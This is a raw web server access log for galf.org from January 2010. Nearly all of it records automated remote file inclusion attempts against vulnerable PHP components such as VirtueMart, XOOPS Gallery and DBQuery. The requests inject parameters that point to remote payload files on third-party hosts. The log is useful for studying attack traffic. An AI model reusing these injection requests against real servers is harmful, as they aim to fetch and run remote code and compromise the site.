89.234.63.107 - - [17/Jan/2010:21:21:14 -0800] "GET /logs//skin/happycast_board/view.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.234.63.107 - - [17/Jan/2010:21:21:14 -0800] "GET /logs/access_091214.log%20%20//skin/happycast_board/view.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.234.63.107 - - [17/Jan/2010:21:21:59 -0800] "GET /skin/happycast_board/view.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.234.63.107 - - [17/Jan/2010:21:21:59 -0800] "GET /logs//skin/happycast_board/view.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.234.63.107 - - [17/Jan/2010:21:21:59 -0800] "GET /logs/access_091214.log//skin/happycast_board/view.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.234.63.107 - - [17/Jan/2010:21:22:01 -0800] "GET /logs/access_091214.log//skin/happycast_board/view.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.234.63.107 - - [17/Jan/2010:21:22:01 -0800] "GET /skin/happycast_board/view.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.234.63.107 - - [17/Jan/2010:21:22:01 -0800] "GET /logs//skin/happycast_board/view.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.234.63.107 - - [17/Jan/2010:21:22:30 -0800] "GET /logs/access_091214.log//skin/happycast_board/view.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.234.63.107 - - [17/Jan/2010:21:22:30 -0800] "GET /logs//skin/happycast_board/view.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.234.63.107 - - [17/Jan/2010:21:22:30 -0800] "GET /skin/happycast_board/view.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:21:25:12 -0800] "GET /inc/formmail.inc.php?script_root=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:21:25:15 -0800] "GET /logs/access_091123.log%20%20//inc/formmail.inc.php?script_root=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:21:25:17 -0800] "GET /logs//inc/formmail.inc.php?script_root=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:21:25:25 -0800] "GET /logs/access_091102.log%20%20//inc/formmail.inc.php?script_root=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:26:00 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.235.54.152 - - [17/Jan/2010:21:26:00 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.235.54.152 - - [17/Jan/2010:21:26:04 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.235.54.152 - - [17/Jan/2010:21:26:30 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.235.54.152 - - [17/Jan/2010:21:26:30 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.235.54.152 - - [17/Jan/2010:21:26:30 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.235.54.152 - - [17/Jan/2010:21:26:47 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.235.54.152 - - [17/Jan/2010:21:26:47 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.235.54.152 - - [17/Jan/2010:21:26:48 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.19.247.188 - - [17/Jan/2010:21:27:58 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [17/Jan/2010:21:27:58 -0800] "GET /logs/access_091207.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [17/Jan/2010:21:27:58 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:28:06 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
64.235.54.152 - - [17/Jan/2010:21:28:06 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.235.54.152 - - [17/Jan/2010:21:28:06 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.19.247.188 - - [17/Jan/2010:21:28:29 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.19.247.188 - - [17/Jan/2010:21:28:29 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.19.247.188 - - [17/Jan/2010:21:28:29 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.19.247.188 - - [17/Jan/2010:21:28:34 -0800] "GET /logs/access_091221.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [17/Jan/2010:21:28:45 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [17/Jan/2010:21:28:45 -0800] "GET /logs/access_091109.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [17/Jan/2010:21:28:45 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.192.120.211 - - [17/Jan/2010:21:28:57 -0800] "GET /logs/access_091221.log////skin/ggambo7002_board/comment_modify.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.250.252.242 - - [17/Jan/2010:21:28:57 -0800] "GET /logs/access_091214.log HTTP/1.0" 200 7250807 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
67.192.120.211 - - [17/Jan/2010:21:29:10 -0800] "GET /logs/access_091026.log////skin/ggambo7002_board/comment_modify.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [17/Jan/2010:21:29:41 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [17/Jan/2010:21:29:41 -0800] "GET /logs/access_091221.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [17/Jan/2010:21:29:41 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [17/Jan/2010:21:29:59 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.19.247.188 - - [17/Jan/2010:21:29:59 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.19.247.188 - - [17/Jan/2010:21:29:59 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.172.33.230 - - [17/Jan/2010:21:30:02 -0800] "GET /logs/access_090803.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:21:31:51 -0800] "GET /logs/?sourcedir=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:21:31:51 -0800] "GET /?sourcedir=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:21:31:51 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:21:32:08 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:21:32:08 -0800] "GET /logs/access_091221.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:21:32:08 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:21:32:21 -0800] "GET /logs/access_091221.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:21:32:21 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:21:32:21 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:21:32:24 -0800] "GET /logs/access_090803.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:21:32:32 -0800] "GET /logs/access_090803.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:21:33:12 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:21:33:12 -0800] "GET /?sourcedir=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:21:33:12 -0800] "GET /logs/?sourcedir=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:21:33:23 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:21:33:24 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:21:33:24 -0800] "GET /logs/access_091221.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.59.90 - - [17/Jan/2010:21:33:38 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.59.90 - - [17/Jan/2010:21:33:38 -0800] "GET /logs/access_091221.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.59.90 - - [17/Jan/2010:21:33:38 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:21:33:39 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:21:33:39 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:21:33:39 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:21:33:39 -0800] "GET /logs/access_091221.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:21:33:39 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:21:33:39 -0800] "GET /logs/access_091221.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:21:33:43 -0800] "GET /logs/access_090803.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:21:33:54 -0800] "GET /logs/access_090803.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:21:33:58 -0800] "GET /logs/access_090803.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.59.90 - - [17/Jan/2010:21:34:09 -0800] "GET /logs/access_090803.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:21:34:16 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:21:34:16 -0800] "GET /logs/access_091221.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:21:34:16 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:21:34:30 -0800] "GET /logs/access_090803.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.192.120.211 - - [17/Jan/2010:21:34:42 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.192.120.211 - - [17/Jan/2010:21:34:48 -0800] "GET /logs/access_100111.log////skin/ggambo7002_board/comment_modify.php?dir=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [17/Jan/2010:21:36:25 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [17/Jan/2010:21:36:25 -0800] "GET /logs/access_091221.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [17/Jan/2010:21:36:25 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [17/Jan/2010:21:36:43 -0800] "GET /logs/access_090803.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:37:21 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:37:21 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:37:21 -0800] "GET /logs/access_091221.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:38:37 -0800] "GET /logs/access_090803.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:21:39:48 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:21:40:20 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:42:33 -0800] "GET /logs/access_091221.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:42:33 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:42:33 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:43:09 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://acolmi.org/images/save.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:43:09 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://acolmi.org/images/save.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:43:13 -0800] "GET /logs/access_091221.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://acolmi.org/images/save.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:43:30 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:43:30 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:43:34 -0800] "GET /logs/access_091221.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:44:13 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:44:13 -0800] "GET /logs/access_091221.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:44:13 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:21:44:26 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.223.143.131 - - [17/Jan/2010:21:44:26 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.223.143.131 - - [17/Jan/2010:21:44:28 -0800] "GET /logs/access.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.223.143.131 - - [17/Jan/2010:21:45:16 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.223.143.131 - - [17/Jan/2010:21:45:16 -0800] "GET /logs/access.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.223.143.131 - - [17/Jan/2010:21:45:17 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.19.247.188 - - [17/Jan/2010:21:46:16 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [17/Jan/2010:21:46:16 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [17/Jan/2010:21:46:16 -0800] "GET /logs/access_090803.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [17/Jan/2010:21:46:23 -0800] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:21:46:35 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
